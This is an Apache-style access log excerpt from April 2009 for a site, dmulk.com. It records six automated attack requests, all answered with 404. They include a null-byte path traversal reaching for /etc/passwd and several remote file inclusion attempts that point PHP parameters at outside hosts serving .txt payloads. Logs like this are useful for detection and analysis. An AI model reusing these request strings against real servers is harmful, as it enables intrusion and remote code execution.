194.213.194.14 - - [28/Apr/2009:10:39:20 -0700] "GET /logs/access_090302.log%20%20/index.php?lg=../../../../../../../../../../../../../etc/passwd%00? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.147.29.190 - - [28/Apr/2009:10:39:20 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://olesya.biz/aJz.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.147.29.190 - - [28/Apr/2009:10:39:20 -0700] "GET /logs/access_080923.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://olesya.biz/aJz.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.89.68 - - [28/Apr/2009:10:39:36 -0700] "GET /logs/access_081130.log%20%20/_blogadata/include/struct_main.php?incl_page=http://jeta.co.kr//bbs/component/.jpg/kantap.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.64.34.249 - - [28/Apr/2009:10:39:40 -0700] "GET /logs/access_081101.log/index.php?visualizar=http://isepic.tugaspeed.info/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:10:39:40 -0700] "GET /logs/access_071214.log///skin/zero_vote/error.php?%20dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
